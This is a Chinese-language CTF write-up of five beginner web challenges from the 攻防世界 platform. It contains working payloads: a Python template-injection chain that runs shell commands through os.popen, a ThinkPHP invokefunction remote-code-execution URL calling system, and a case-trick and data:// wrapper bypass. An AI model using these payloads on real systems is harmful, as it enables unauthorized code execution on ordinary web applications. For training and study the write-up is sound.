攻防世界

01.在这里插入图片描述
由题目描述,查看初始页面,apache的默认初始页面是index.php故直接访问,发现被转移了F12查看究竟在这里插入图片描述
这里解释一下302请求
302 Found,原始描述短语为Moved Temporarily,是HTTP协议中的一个状态码(Status Code)。可以简单的理解为该资源原本确实存在,但已经被临时改变了位置;换而言之,就是请求的资源暂时驻留在不同的URI下,故而除非特别指定了缓存头部指示,该状态码不可缓存。
对于服务器,通常会给浏览器发送HTTP Location头部来重定向到新的新位置。 所以点击之后就发现了这道题flag
02.
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
查询了一下robots的协议然后我们访问robots.txt
在这里插入图片描述
请无视那个不许访问,就得到本题答案了
03.在这里插入图片描述
这是一道python模板注入的题,经过百度学习
首先看看有没有漏洞点输入{{7+7}}
在这里插入图片描述
查看一下所有的模块,/{{[].class.base.subclasses()}},找到我需要调用的site._Printer(‘os’),列在72位。在这里插入图片描述

在之后{{[].class.base.subclasses()[71].init.globals[‘os’].popen(“ls”).read()}}利用他查看文件都有啥
在这里插入图片描述
然后导fl4g图片{{[].class.base.subclasses()[71].init.globals[‘os’].popen(“cat fl4g”).read()}}在这里插入图片描述
04.php_rce
查找flag:http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

payload:http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag 得到flag
05.一种可以直接构造一个伪协议data://text/plain,xxxx(要执行的php代码)
另一种因为这个函数是区分大小写的所以就可以直接把php大写就可以然后用burp抓包传参就可以了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值